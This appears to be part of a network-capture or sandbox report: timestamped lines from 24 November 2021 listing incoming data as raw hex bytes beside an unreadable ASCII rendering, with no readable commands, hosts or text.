                                                                                                  2021-11-24 13:16:13 UTC98INData Raw: 86 e7 be 76 0c b8 77 b9 91 3c 76 54 22 3b 1f f2 53 d1 75 1c 43 56 14 0a 2b a3 8a b9 9b 53 26 4a be f5 82 62 5a a4 07 ef c5 7a e4 7c 7f 26 60 bc ce 93 b0 b6 3e 10 ff 19 97 41 49 9e f7 6d f1 3f 18 a2 fd a7 84 e0 23 fd 11 bf 44 71 3f 86 4e 94 a3 9a 02 cf f1 f2 4f c4 b9 7d 72 38 b7 25 0d 39 0e dd 31 3c eb 43 19 87 39 31 11 6b a9 df 36 b1 ef 89 63 d3 de da 02 b8 1b 9e 94 e7 1b 3d d0 dd d8 19 b1 21 3e 79 b6 45 bc 9d 64 86 db 83 06 2e cf ea 74 e1 9c 95 60 01 e7 e0 88 eb 3c 65 9b ee 1b 16 02 9a 96 02 39 46 e1 9e 7f 48 16 66 3f 41 5a 29 9e 4a 0c 5b d2 ea 09 3f 7b b5 f9 56 c7 0b a8 65 d8 a6 6d a4 5d 56 02 6f 2c 67 e7 ee 02 cd 4a 5e 37 f6 a3 c4 96 06 5c 75 f7 2e ca ec 33 bb b7 3b f8 e0 33 9d 46 b0 e9 b8 51 f9 55 a4 8f 33 e9 66 10 1f 4f 4a 1a af 80 4e 30 89 0a c4 00
                                                                                                  Data Ascii: vw<vT";SuCV+S&JbZz|&`>AIm?#Dq?NO}r8%91<C91k6c=!>yEd.t`<e9FHf?AZ)J[?{Vem]Vo,gJ^7\u.3;3FQU3fOJN0
                                                                                                  2021-11-24 13:16:13 UTC99INData Raw: 10 bc 37 06 0e 2b 7c 1d 34 7e 23 b6 21 68 ad 62 5c 8d 3c d5 5a e7 9b ef 73 d9 97 a6 4f 3e 4b 11 d6 8a 61 21 66 79 bf d7 14 d0 66 86 1e fc d2 db d5 8e 29 af 48 29 5c 95 f2 0d de 60 ed 97 4a 6d 30 f9 48 ea 5c 9e f6 39 05 53 a5 8b 5f 54 a4 1d 48 21 06 ef d6 1e 56 17 41 3b f9 ae d4 39 1c a9 4b 79 cf de 84 68 dd 04 7e 3d 48 c2 7e 38 65 33 c5 46 0f 39 b5 80 21 25 23 45 9f 23 af 22 e1 5c 2b c4 8d 68 c3 4f 2c b5 ae 78 4a 90 e4 78 0e 50 27 a0 80 fb 4b 3a cd 7b 4f 98 16 00 51 22 e4 79 da 07 af 9a 12 e1 90 ef bd 87 90 2e 60 c4 82 3c 4d c5 b8 9e f4 de 54 0e 90 ca af 4c bb 38 7b 5b 44 92 c2 27 c4 f3 4d ef b3 6d ea d8 a3 a9 98 38 1b 61 6f f6 d7 4f 0e eb f2 33 85 d5 16 a4 9e 9c 18 4c 16 8c 04 fa 4b 18 9a 0e ee ae 2e 9c dd a0 06 75 33 c7 75 43 ce 4b 0e f5 85 23 1b 7f ce
                                                                                                  Data Ascii: 7+|4~#!hb\<ZsO>Ka!fyf)H)\`Jm0H\9S_TH!VA;9Kyh~=H~8e3F9!%#E#"\+hO,xJxP'K:{OQ"y.`<MTL8{[D'Mm8aoO3LK.u3uCK#
                                                                                                  2021-11-24 13:16:13 UTC100INData Raw: 82 50 9d 1f 80 2a 57 a6 6e 25 ba 91 d9 a4 b2 0a 67 6d ff c4 7c 28 51 9c f7 af 21 d5 58 58 23 b9 39 47 ec 02 62 73 5b 85 91 f4 47 e8 0a 5c 7a 87 7f 09 8e 87 df 14 6f ef 54 c9 fb 38 8b f5 8d 0f 2e 7a e5 ab 13 53 07 9a c2 0c 05 e1 55 bb 22 3a 4f c8 bd 6f 2c ea df 23 4d ea 93 c8 0d bd 17 5c 01 3e 8a 40 21 b7 30 4b 63 0a 40 bb 5c 67 1d 87 40 36 9d 69 83 bf 98 8d 30 0e 4a 47 b3 bc 54 40 1d 64 53 05 73 34 ba 98 b3 1c 43 a9 f8 13 a1 49 1f dd 75 43 a8 92 2c 04 bd bb 6c 0a 90 9e ab 9c 92 2f 6a ae 3f 06 77 7e c4 86 49 f2 11 fb e6 5a 29 0c a5 58 0d 79 2f c6 00 3c c7 b4 60 bb 78 d7 d9 e6 36 c4 0c 18 80 6a 8c 60 ef 2b b5 2a b2 1a ce 36 1a 4e 6c de ec d7 82 9f 31 1c 16 69 ad 56 2a 4e 08 ea a2 c5 d8 1e 64 b3 e0 63 11 6b 0c 54 6d 27 39 4a 6e f0 b1 23 62 d6 7d f8 84 d2 88
                                                                                                  Data Ascii: P*Wn%gm|(Q!XX#9Gbs[G\zoT8.zSU":Oo,#M\>@!0Kc@\g@6i0JGT@dSs4CIuC,l/j?w~IZ)Xy/<`x6j`+*6Nl1iV*NdckTm'9Jn#b}
                                                                                                  2021-11-24 13:16:13 UTC102INData Raw: 1f a4 db c0 91 5e cc 50 2c 9d 45 98 a7 99 7a 86 d5 5a 47 f5 de 4e e2 33 4c f1 b6 d1 52 e3 2a b9 4b 91 b2 a5 e5 d3 c9 23 7a b6 e9 4b 60 3c 25 e8 59 06 4b 27 b8 42 76 5a f0 fb 20 c3 2d 60 da f8 bc ce d9 72 29 f6 e7 de ec 00 73 92 b9 67 d9 d9 d7 5f a1 10 02 6a 9e 03 a6 96 2b c4 7a ba 26 5d e3 ec 69 3c 23 87 e9 24 a6 9c 5e e9 d0 7c d3 22 3e 13 0d d7 b4 5c c5 a6 ba 0d c5 1c a1 a3 fd b9 59 1c 22 5f 92 1d ba 8a 00 60 a5 bb ee d5 63 79 bc 58 fa 0d 14 36 2f 7e 52 1e 1c 18 f9 b9 4d a1 ba b5 bd bb 78 84 23 2e 68 ea d3 1e 71 8e 45 bd fa 2e 95 61 38 21 82 f4 c3 ef 8d 6d a2 51 45 e6 58 ea 57 af 5d 1b b3 a8 07 e8 99 a9 7b e5 5d 6f 02 ac 13 5a b4 32 50 95 5a 32 58 d6 d7 2a 73 64 17 c2 5c 29 e6 b6 1e 18 b9 a4 27 fe a6 1a 3f 4f f6 19 89 69 00 3d 4e de b9 cf d0 a0 cc f2 c3
                                                                                                  Data Ascii: ^P,EzZGN3LR*K#zK`<%YK'BvZ -`r)sg_j+z&]i<#$^|">\Y"_`cyX6/~RMx#.hqE.a8!mQEXW]{]oZ2PZ2X*sd\)'?Oi=N
                                                                                                  2021-11-24 13:16:13 UTC103INData Raw: 91 a9 ee 3c 43 d1 23 34 44 72 3b 77 96 02 4e 25 65 1f ff c1 c1 0c 40 3d bb 36 18 07 a1 5c d8 a6 6c 5a 04 fb ed 90 be ae cb 0a d7 be 55 e5 06 6b 9b 10 c0 0a a3 45 69 4a 75 7c 31 10 60 fd ba 19 a4 59 b3 15 4f 33 cf 43 80 05 b7 30 fd 8b 3c f5 94 58 3b 2c b6 9f 10 7d 9c 3d 89 76 15 68 6b 8c 65 78 3a 1b af 3d 1c 94 7c 6d eb ee 92 4b 28 d3 1a 10 51 af e9 df 85 be f2 09 4f 69 9f 97 39 3d 22 22 8d 8e c9 2f 66 f4 0a 83 dc ae d0 cb 2f e8 fd 50 8a 74 76 10 bd 14 23 f2 ce 3e de 90 98 52 65 e1 dc 3e 71 34 18 a7 bc 49 7b 09 83 a8 5f 77 22 81 ad 3f 1f 7b 24 0a df 85 21 43 dc 3f c0 9b 48 22 d6 d5 41 78 c8 93 98 b3 54 da 49 72 75 35 10 09 50 44 ff d7 f8 45 67 ee 7b a7 70 a8 c4 7f 1d b1 fd 72 44 c8 e1 fc 2c a3 d6 36 e0 8a c3 15 83 a5 e5 0f bd be 76 4c 5a 9d 1b a5 90 56 cc
                                                                                                  Data Ascii: <C#4Dr;wN%e@=6\lZUkEiJu|1`YO3C0<X;,}=vhkex:=|mK(QOi9=""/f/Ptv#>Re>q4I{_w"?{$!C?H"AxTIru5PDEg{prD,6vLZV
                                                                                                  2021-11-24 13:16:13 UTC104INData Raw: 69 6c a5 e1 dd a4 83 48 88 81 9e 2c 06 a9 0e 32 e6 34 bb 4e 6d 10 d1 49 09 c7 c6 8a 4d 9c 4c 40 5f f6 2d 06 28 98 e6 58 c2 c0 b8 3f 5c ed 0a 50 ba cb 54 10 de bc 7b 29 21 ec 68 40 9e df 71 78 41 00 ee 63 9e fe 7a 02 f3 e2 df 1a 98 5a 3a b7 32 a7 47 4b 54 b3 9e be 19 d5 76 26 bc a1 80 d5 9d 31 c6 68 52 86 98 8e 2d 66 44 39 82 75 79 51 35 82 4c cc bb 47 2d e5 28 a0 bb 9f d9 20 61 a6 ff 88 50 72 9b 9b 89 4f f2 5f 49 2d 5f a0 27 e3 ae b9 20 bb 6f 7e eb 9a 01 34 f1 ff 48 91 10 de 71 57 3a cc fd 19 27 6f 89 dc 34 12 0b bc 13 e5 71 18 3d 73 0d a9 43 04 f5 b6 23 df 2a df d8 cd 1d 03 5b 18 77 b6 0e 4a d7 39 82 b9 d8 39 5b 7d 48 59 be 12 c9 47 95 7a 04 98 86 e0 21 c0 a0 21 b4 39 d5 18 3f 00 60 46 a7 ba f7 c4 9f 50 5e 76 17 b9 17 26 70 5c 66 a4 35 5f 5e e0 98 18 86
                                                                                                  Data Ascii: ilH,24NmIML@_-(X?\PT{)!h@qxAczZ:2GKTv&1hR-fD9uyQ5LG-( aPrO_I-_' o~4HqW:'o4q=sC#*[wJ99[}HYGz!!9?`FP^v&p\f5_^
                                                                                                  2021-11-24 13:16:13 UTC106INData Raw: 61 68 7d 1b ee b2 e4 18 b1 a0 70 d3 ca 4a ef 05 ab 8b 29 76 d9 85 59 dd 8b 86 11 83 2b 68 7a 86 12 d4 07 e6 52 14 9d 63 88 94 10 a2 c9 09 11 ff 08 0f 71 96 86 f4 79 cf 51 f9 e2 57 25 99 f8 26 5c 7e 3b 32 20 0f e0 7d e6 65 70 bc 82 47 cd cd c0 ba 52 74 72 10 aa 40 0c 7d d4 5d 81 3e 4d 21 cb 72 14 92 2d 85 ec 86 f6 3b ce b5 3b f3 5b f7 4d 5b 95 1d 67 fd 55 d6 82 cd e8 39 fe 4b 71 89 9f 7c f9 d6 af e2 36 2b 7e 5b 61 d4 3f 8b 73 0f 5b fc 72 40 d5 3b 85 55 99 b7 cc 23 d9 ae 52 26 d4 8a 84 01 76 b4 21 1a 7b e1 34 7d 5d 77 fc 69 6f 1d 4d 02 ca 7a 5f 3a 84 32 ce b5 59 97 fd d1 b8 bf ba 10 a5 e3 ea 15 94 d8 17 b5 5c 67 c3 0b d6 d3 0c 28 91 3f c7 cb 22 1d 72 c4 4a 8f c8 a4 85 aa b2 a1 10 62 17 6a dd 69 85 61 3f 41 11 08 39 66 3c 6c b0 e8 ff 4a 4c 22 9b 74 45 d2 22
                                                                                                  Data Ascii: ah}pJ)vY+hzRcqyQW%&\~;2 }epGRtr@}]>M!r-;;[M[gU9Kq|6+~[a?s[r@;U#R&v!{4}]wioMz_:2Y\g(?"rJbjia?A9f<lJL"tE"
                                                                                                  2021-11-24 13:16:13 UTC107INData Raw: 3f a2 31 5b 73 a6 c1 59 a9 3a 12 9a 77 fd 38 48 b0 ac 89 d4 5b fe c1 1a 0d 25 d8 7b 29 7b 9f af 65 d9 51 be c0 35 b1 b1 e5 bf 18 eb 48 6e d3 55 d7 d2 09 a5 5d 5f 8b 91 8e 20 5c f1 97 4a e2 d8 56 be 95 42 71 04 6e 8e fa 5f e3 5d e2 d4 0d f9 7e 99 cb 7e f4 c9 73 eb 72 e7 d3 a7 fb 94 20 69 d6 f6 74 0e bf 07 42 2a 2b 54 15 25 0f d3 13 f3 49 0d e8 28 43 a0 c7 f5 b7 62 5c 4a 68 50 fc 7e ef b3 20 86 53 75 2f 9e 6c 60 4c e0 d2 b0 0a e9 5e 05 c9 a7 f9 4e fd 30 a9 94 6e 64 ec 51 7a 4e 90 66 8d a9 83 79 1c ca 4d 3e da 32 a2 7a 62 82 a0 4a 5f 42 7c b3 01 b5 4f 2d ea 96 64 3b b0 02 a1 81 e3 61 7c 5f 5a dd f1 18 01 8c 58 7a 90 ff 45 44 80 72 bc 69 5b a1 f5 00 4c 94 e6 dc 63 5b ab 53 0c d6 12 0a 93 ee 30 dc b9 1b cb e6 fd 77 dc 5c 1b d4 db 6e 33 9a dd 6a 44 1a 61 79 00
                                                                                                  Data Ascii: ?1[sY:w8H[%{){eQ5HnU]_ \JVBqn_]~~sr itB*+T%I(Cb\JhP~ Su/l`L^N0ndQzNfyM>2zbJ_B|O-d;a|_ZXzEDri[Lc[S0w\n3jDay
                                                                                                  2021-11-24 13:16:13 UTC108INData Raw: aa a8 30 93 e3 db 92 f5 0d 51 73 d6 ad 26 8e a4 a5 bb 21 79 d8 74 fb ea 12 9b 8d ce 35 db 06 35 2f 94 f2 d6 de fe a9 e5 6d fb e5 d6 98 a2 4e 4e 6d e3 4b 2a 2d 06 e9 f0 a2 f7 23 39 ed d0 21 be b6 0e a9 35 c2 98 f5 72 5e 6a 09 39 c1 3b 28 f6 1c 02 4a c9 83 6d 27 4b 07 b2 d7 1c 8e e2 8b 79 50 05 68 44 84 d2 f1 62 75 da 89 71 0a 3d 2c 6e 05 1c 58 c4 51 e3 ba 08 bf 1c ca 34 14 f5 f3 d4 c2 df 7a 72 16 5a 4a 2e 09 51 d2 18 c7 fb 88 85 63 99 ab e0 fe 52 35 5d 74 8f 4a c4 dc 6e d5 30 45 d5 fa ce 0b ca 0e 1d e2 f9 6e f6 07 f2 da f3 e7 8a c8 e2 e4 31 7b 1f ee d8 d4 96 8b 69 c4 94 ed 0c 66 8a df 3e 36 cc 78 c7 fb f2 b3 4f e3 a9 53 c1 81 95 e8 8d e0 db b9 19 c9 34 59 81 70 08 f2 c4 be 33 05 10 54 5f 48 b9 14 a8 4f 51 ba 25 ba 92 f1 e5 90 f5 79 0c c4 29 f3 15 d5 44 52
                                                                                                  Data Ascii: 0Qs&!yt55/mNNmK*-#9!5r^j9;(Jm'KyPhDbuq=,nXQ4zrZJ.QcR5]tJn0En1{if>6xOS4Yp3T_HOQ%y)DR
                                                                                                  2021-11-24 13:16:13 UTC109INData Raw: 5c 2e 36 3c 01 2e d1 ac 82 18 c5 c7 b6 12 69 ad 57 08 fb e5 89 ee df c7 0a e5 67 1c b6 4d 42 18 cd 65 fc 08 5c 5d c6 13 6e 3e 81 a9 32 4d 69 ce 62 ee be ce 74 51 34 5d 69 80 d1 88 06 f8 b2 f1 a8 da 2a 60 31 c8 06 b0 d8 45 8c e9 f6 ec 40 1a 10 f2 3b 22 60 d4 5f 71 58 9f ce 29 7f c4 96 1d 26 89 d0 09 2f 65 ad aa dc 00 bf 47 85 fe b1 17 d6 b0 20 7b d4 34 e4 5c 52 b9 a2 c0 2c 12 59 92 43 3b a7 d0 d0 8b 7f 13 19 5a 66 29 89 f9 bd 4c ce dc ef bc 4c 2d c4 47 98 48 9b 07 8d 05 7a 37 36 ba 65 32 e3 01 57 fc 66 2f 75 d4 27 06 39 ca 5d 52 25 78 33 84 79 59 7d 30 e2 22 11 ab 08 29 20 ae fe f7 ca 55 bd 3d bc 38 77 f4 d3 48 40 a4 fa f1 c9 2c da c4 d6 04 f6 8d 1a 95 4b d8 f9 19 81 78 c0 3d 9b 86 67 37 59 8b 2f 1c 64 df 40 60 5c 7f 6a 31 11 a7 b3 b9 b4 e6 fd 88 1c 23 cd
                                                                                                  Data Ascii: \.6<.iWgMBe\]n>2MibtQ4]i*`1E@;"`_qX)&/eG {4\R,YC;Zf)LL-GHz76e2Wf/u'9]R%x3yY}0") U=8wH@,Kx=g7Y/d@`\j1#
                                                                                                  2021-11-24 13:16:13 UTC111INData Raw: 9f 63 53 c1 b6 0b 9c 09 a0 e5 32 5d 37 04 a7 df c0 69 0d 1f c8 62 6a 11 6a fd 3e da b0 d8 c4 f5 62 35 03 3f c7 09 ad 80 ec 40 00 58 62 a6 73 3d 81 d5 17 ec c5 04 20 40 e3 e6 e8 38 08 30 bb 43 e6 fe 9a a4 1d 1e 7e bd a0 81 a6 86 50 aa 90 3a 48 f9 2d da dc d6 45 0c ac cf 55 98 c9 6e 83 22 ac b4 95 a4 5f 93 45 4f 68 aa ae 74 0a 4a 48 d9 8a a5 5a 26 c1 9d 70 18 e1 69 11 5f 24 08 45 bb 80 38 28 b2 16 39 0d 94 dd 74 1c 33 ad f8 39 39 d3 ad 40 bf ea 81 5c e9 76 dd 8a d9 4c 99 30 6b e4 82 25 88 c9 23 c7 f2 bf e1 4b 1d 80 00 52 3b a2 e0 55 ed d2 83 ee d7 6b f6 91 ac 8f 6f 6c 27 5c cb a4 c5 ea ef fc 1f 66 ba 63 d3 ed 62 09 52 62 af a2 03 dc ea 06 b6 ad 17 b9 d1 df 13 1e 30 c5 c6 14 38 f2 03 2c 0d 63 df 04 05 f6 20 15 38 1e 2b b8 a2 30 e7 c8 bc cc bc 14 49 c4 7c f5
                                                                                                  Data Ascii: cS2]7ibjj>b5?@Xbs= @80C~P:H-EUn"_EOhtJHZ&pi_$E8(9t399@\vL0k%#KR;Ukol'\fcbRb08,c 8+0I|
                                                                                                  2021-11-24 13:16:13 UTC112INData Raw: f2 c5 31 e6 25 97 af a3 b7 3d 3d cf 48 b0 d2 0c c4 2e 48 cd 9c cc 84 ed f3 0b e6 49 07 1f 5b 86 5a f0 e0 10 ac c6 ca bc 5f 14 3d f9 96 69 45 c4 15 ac 65 c7 3f 9b 48 08 41 b5 50 0e 42 36 41 82 33 ab 0e 82 ca 7b 1f e6 83 94 9c 97 38 18 40 da f2 d2 1c 7d 2a f1 bc b9 a1 b2 70 4f fa cc 7b e3 ba 0c 88 24 8d d7 70 25 39 17 d8 b3 3e a9 6a 6b 6f 7a 14 45 53 e3 d9 1f 68 a8 54 1a de ba ed 67 65 f7 71 89 2b 78 d3 ad e7 ab a8 cc fb 50 0a e7 51 10 39 b1 ce 51 4d 0c 7a ab 77 72 9d ba a8 f8 1b a7 41 ca 66 14 37 55 71 a3 e4 42 47 c8 96 d4 0e e1 7c e5 4a d0 c2 b6 5f cb 00 e6 b9 6a be 34 2c a8 d6 71 f1 e7 f0 b2 e7 ba 1f f5 a7 8c 60 5d d9 fc e7 88 a6 04 af 38 c9 dd b5 c4 36 67 d1 ce 4d c5 43 8e 47 46 1d f1 29 bb b5 87 31 cd 62 39 4d b6 70 f1 23 3b 6b c9 71 49 fe fb a6 42 6c
                                                                                                  Data Ascii: 1%==H.HI[Z_=iEe?HAPB6A3{8@}*pO{$p%9>jkozEShTgeq+xPQ9QMzwrAf7UqBG|J_j4,q`]86gMCGF)1b9Mp#;kqIBl
                                                                                                  2021-11-24 13:16:13 UTC113INData Raw: 47 9a cb 26 61 41 03 e2 a7 51 66 e8 08 26 48 0d 34 53 6d e5 35 bc 08 da 64 6d 8a c6 2d f1 1f 01 34 33 b3 95 fb 5c 16 05 08 41 55 19 f4 78 b5 da b0 62 c8 30 70 d6 54 6b 2f e1 d2 00 c5 3a 16 5a df b3 82 bd e2 80 db 56 3a 5d 04 53 2b 69 1b fe ea 30 ee 4c 6a ed e7 47 e3 04 cf a8 ae f7 5a 3a 6b d1 ad 2c 91 ab 80 45 c0 ef 41 f5 1a 37 25 e6 03 5e 1d 1e ab 81 fa 93 fa 5e 15 de cf 73 44 42 d4 21 54 71 2a 51 8f 9f 94 99 e0 d8 c7 e2 c4 ce 7b 9d e1 1a 81 3e b1 ec 91 39 6d 8c e0 c1 1f 5c 72 39 fe d9 67 85 f8 9d c5 34 43 b9 4f 0e 14 ca cd ba d5 2a 83 b5 1d f4 05 21 72 f6 2b 2a c0 b2 86 92 bc e8 6e 00 cb 50 db 31 ef b8 d5 5d 0b c6 91 27 e9 86 b0 22 ba 4f d0 9c e9 f3 b0 de 8d b9 d4 5f 8d 7b 57 95 2a 7d 26 b4 5f d2 e7 0c de 07 c1 2e 7c 3d 8f e9 aa ff d8 e0 2b 82 73 b8 f0
                                                                                                  Data Ascii: G&aAQf&H4Sm5dm-43\AUxb0pTk/:ZV:]S+i0LjGZ:k,EA7%^^sDB!Tq*Q{>9m\r9g4CO*!r+*nP1]'"O_{W*}&_.|=+s
                                                                                                  2021-11-24 13:16:13 UTC114INData Raw: a0 78 47 bd cd 06 6a 8d b5 0b 90 f4 39 ba 35 38 0c f7 a4 9b f3 22 0b e5 c9 1e a9 ce 39 a5 e1 f2 a3 58 fb 8f 19 cb ad 35 9b e6 82 28 5f 79 fe 19 f2 0f 48 6d 35 e0 69 30 83 f7 60 20 8b d0 b3 1b 39 79 c5 64 f4 9e dd 96 7c 1a be 6e c4 4e ab 54 44 e8 ba 47 8e 35 f6 c0 ae ee 15 48 e8 50 1a e5 44 26 44 a2 0e 2c bf eb b7 0a dc 2f 95 36 e2 d7 34 ac df a0 3a a5 43 0e 88 b8 47 99 a0 b0 c3 4c 52 5f 3b 02 d2 cc 42 50 4c 38 d9 4f 2f 73 25 1a 06 12 98 a4 d7 6d 7e ef f1 63 a1 ba b0 22 2c 97 4a d8 3c 9c 27 ed f2 8a 4a e1 cc e3 8d 37 f6 72 9a 5c 49 40 79 1c 1f db 12 8e bf 48 84 7f b2 ac ee e2 56 b6 00 7a 5b da 61 ca 43 bc 08 09 5f 93 8d d5 b5 f2 0f 50 76 c0 dc ff 74 48 3b 44 26 01 ca 42 02 4c d8 8a 09 cb a4 1f 4b 28 bb da 04 5c e6 20 73 21 ee 5e f1 77 33 4c c0 ff a7 b9 78
                                                                                                  Data Ascii: xGj958"9X5(_yHm5i0` 9yd|nNTDG5HPD&D,/64:CGLR_;BPL8O/s%m~c",J<'J7r\I@yHVz[aC_PvtH;D&BLK(\ s!^w3Lx
                                                                                                  2021-11-24 13:16:13 UTC115INData Raw: 12 fc 78 19 1c f8 d9 9c 25 96 25 c3 5f 19 3c c9 80 d0 2a 62 29 07 09 cf c3 cc c8 f0 f5 a1 0d 43 a3 06 1b 95 b2 96 f7 80 70 ce 0b b8 ab 91 7f d8 a2 09 b9 cd c4 7f f6 27 2d 5d cc 68 ac 5c 04 26 97 f0 55 aa 3b b5 99 87 e1 88 3f 65 81 e0 43 ef 97 32 1b 2b 58 0a eb ae 5a 6a 5c d0 a7 8a 1d 47 e4 4e 52 5a 42 c7 da 28 19 dd 02 e8 7b ec 99 ae 32 9a 64 3d b9 3f 59 c0 e1 82 38 77 4c 47 bb 72 d7 98 7e ce 29 c0 7e 9c d6 11 4f f5 f9 a2 9f 8c d2 91 0a cb e8 d2 09 dd d2 70 ac ef d8 73 75 f7 ed 45 c1 ea c9 47 8b 96 25 15 7c d7 ba fb 50 8c 02 93 30 2b e9 df 76 de 1f ff d8 18 9f 74 8a 02 6b 2f 9b 72 54 36 89 74 c9 16 28 8d c7 9b 74 63 c8 64 59 08 2d a2 fa e1 b8 f8 6c f6 6d 85 47 61 12 73 b3 cf 2c ef 39 9b 96 27 4f 59 be d4 64 19 b3 e0 aa 11 7c 8a ba d8 cd 2b 7f 2d b7 14 f1
                                                                                                  Data Ascii: x%%_<*b)Cp'-]h\&U;?eC2+XZj\GNRZB({2d=?Y8wLGr~)~OpsuEG%|P0+vtk/rT6t(tcdY-lmGas,9'OYd|+-
                                                                                                  2021-11-24 13:16:13 UTC116INData Raw: 6a 33 a3 49 4d cf c0 2e 1f 1e 04 ea b6 40 61 ec 8e 5b 98 93 dd b8 b0 e5 ac 0c 86 dd e3 f7 45 9e 1f a4 3a fd 31 01 64 66 76 9d 23 a2 fb 11 49 3e 83 06 84 3b 11 65 db 01 1b 93 da 61 22 e4 cb 39 f0 2d 65 a8 e0 d3 b0 79 14 8d b3 b7 23 c5 15 ff 46 39 1a d2 85 c2 fe e2 12 dd ad 35 b9 3c cc e8 b9 00 ca 60 7c 61 be 74 b3 ac 48 52 75 ef bc d6 e1 35 bd 59 0a ae 80 78 93 7e 51 c1 5f 56 a0 2f ce 60 32 1e 9e 6b 45 e7 3d 90 5a af 94 66 0c c4 fe 54 4a bd 96 1a 1f 80 77 5a ad 6d 1d 1b 6a 3d 7c 00 7d 10 b6 c9 cd f9 57 45 8f 4d 6b 48 8e d0 f2 d0 7d 8c 4c 93 d4 74 82 a9 93 75 09 c5 01 06 16 a3 77 20 a8 ac e3 b2 6e 80 e6 34 a0 88 c3 b8 58 4f 9b 3c 9e 1d 6e fd ed 01 4a 13 e6 0f 23 f7 b1 39 8e 80 f7 ff 89 49 77 91 d4 c5 98 48 33 fe e7 80 7d 54 92 df bf c3 5c 57 69 b6 c4 7f 2c
                                                                                                  Data Ascii: j3IM.@a[E:1dfv#I>;ea"9-ey#F95<`|atHRu5Yx~Q_V/`2kE=ZfTJwZmj=|}WEMkH}Ltuw n4XO<nJ#9IwH3}T\Wi,
                                                                                                  2021-11-24 13:16:13 UTC118INData Raw: 50 64 e3 96 b1 83 ec db ba 27 ce 3a 6e 8d e8 6d f0 0a 22 3f 30 55 3c 7a b4 ab 61 80 16 1e 0c 6c e6 42 e4 24 b6 08 46 8e 3d 07 f5 5d a7 ab 1c 41 b3 30 44 e0 e7 63 dd 3a 3b 53 d4 1d ff e4 6b 0e 7f d7 c2 64 e2 d1 ef 13 e8 f9 e9 f0 95 07 53 fb a4 da 98 4c d3 61 1a 44 b3 74 08 bf cd 6a b0 b5 a9 37 59 53 df 4c 54 2a 8f 40 6e 33 99 e6 2a ac 26 52 fd f4 c6 c1 bf a5 e2 8a 1a 91 78 31 4b 34 56 6b af 7f 68 b7 95 8a c2 eb 35 27 a9 f4 45 28 ad 1b 1a c9 d7 52 83 30 34 ee c7 cc 34 32 de 9f 2d 9c 48 1b 43 3a 6d b8 3f ab 14 c1 11 f8 92 90 1d 93 a9 ad 9a d8 d1 d7 09 8c 40 cc 1e d3 14 0a 82 4e 21 85 41 b7 8e ea 92 5f d7 ce 20 c9 15 a7 4a 86 dd a5 2f 89 80 a9 82 ad 8a b5 75 44 d6 d6 89 53 ca cd aa 50 27 8d 31 34 dc ee 39 f5 30 db 5a d3 50 de e2 3e 85 f9 de 56 80 4a 9c 6a 28
                                                                                                  Data Ascii: Pd':nm"?0U<zalB$F=]A0Dc:;SkdSLaDtj7YSLT*@n3*&Rx1K4Vkh5'E(R0442-HC:m?@N!A_ J/uDSP'1490ZP>VJj(
                                                                                                  2021-11-24 13:16:13 UTC119INData Raw: 5f 1f 66 40 cd bd 22 73 ff bd 39 d4 b2 96 f1 9c 49 d8 c7 1b 4e e5 e0 eb e2 bf ee 7d 36 dd a3 fa 69 30 53 62 35 f6 cf 58 1d 2c 0d ee 59 0d 4a 4d a3 22 c2 af 05 6d fa 9f 21 9f ce c2 57 0d db 59 24 5d 8b 80 90 b1 b7 1f 30 f0 1b f6 18 d7 b0 56 a4 38 96 a3 7f 30 d1 9f f8 fb ba 2d 3d 71 97 ff 5c 28 d2 97 dc fd c4 e8 40 d0 9d 5d 5c d6 3f d5 a0 a9 a2 f2 bc fe 9a c0 0b 94 d4 d8 70 f1 d2 a0 3c 2e 0c af 0e 5d 74 2d 31 95 71 37 21 58 bd dd 49 65 9e 5b c2 e9 75 15 02 1b 98 b0 eb 3d c0 f1 ff ab 46 9f 7a cd f1 eb 8e 47 b7 43 7f 49 63 8f 8e 05 c1 c4 0d 71 42 0e 61 49 36 83 83 d5 73 3a b9 7b 97 a1 74 7a 18 d2 8b e0 b0 8a d9 7c 6b dd 57 55 48 11 cd 1d 79 4f 61 96 86 e0 ae bf d8 6a ca d4 68 c9 4e bc ad c9 36 70 d8 d9 0e 92 33 6c f8 f3 48 17 96 5a 56 28 ee d5 ba c8 28 bb b4
                                                                                                  Data Ascii: _f@"s9IN}6i0Sb5X,YJM"m!WY$]0V80-=q\(@]\?p<.]t-1q7!XIe[u=FzGCIcqBaI6s:{tz|kWUHyOajhN6p3lHZV((
                                                                                                  2021-11-24 13:16:13 UTC120INData Raw: db 36 44 ba 6f 66 12 12 83 e8 4e 27 62 61 a9 2d 27 73 29 15 63 c5 24 d4 8e 07 f3 ad dc 37 46 64 27 a3 cc 12 0d f0 49 e3 2e 8b 4a b8 67 ef 20 34 7a 36 24 a3 d1 3b 4c 93 3b b1 8f b6 e2 d6 53 32 52 e4 d1 ee 78 49 c5 a6 14 c8 9c 69 b5 9e 78 b1 e6 67 3f af 94 b1 fa bc 11 96 d8 49 58 4b fb b4 ad 94 73 5d 19 65 96 96 7f b7 6d 27 e6 76 1a b5 6e df d8 ba 2a 7a 3a 9e b2 6d f5 fb d1 c6 04 f9 52 37 b1 64 7f 61 fd 2b 90 4e 5c 90 67 05 77 e2 a6 02 e6 56 64 e3 01 47 17 dc 12 91 26 64 20 ae 90 5f 97 c7 1b 47 53 c7 35 a7 b1 b1 75 e0 59 81 3d f3 47 48 67 2c 40 88 4e eb 1a b8 3c b0 35 02 30 59 00 d4 43 3d 11 55 ce d5 10 ec 47 e5 18 c6 b3 a2 c8 44 20 ff 74 ee 66 1d e0 3c 5f 68 91 da 25 b3 5a ae 3f a8 6d 06 9f 70 60 23 e6 e3 cd 1b 1e 05 e4 73 a6 61 6f 84 bd 47 b2 9d 0a 4d 92
                                                                                                  Data Ascii: 6DofN'ba-'s)c$7Fd'I.Jg 4z6$;L;S2RxIixg?IXKs]em'vn*z:mR7da+N\gwVdG&d _GS5uY=GHg,@N<50YC=UGD tf<_h%Z?mp`#saoGM
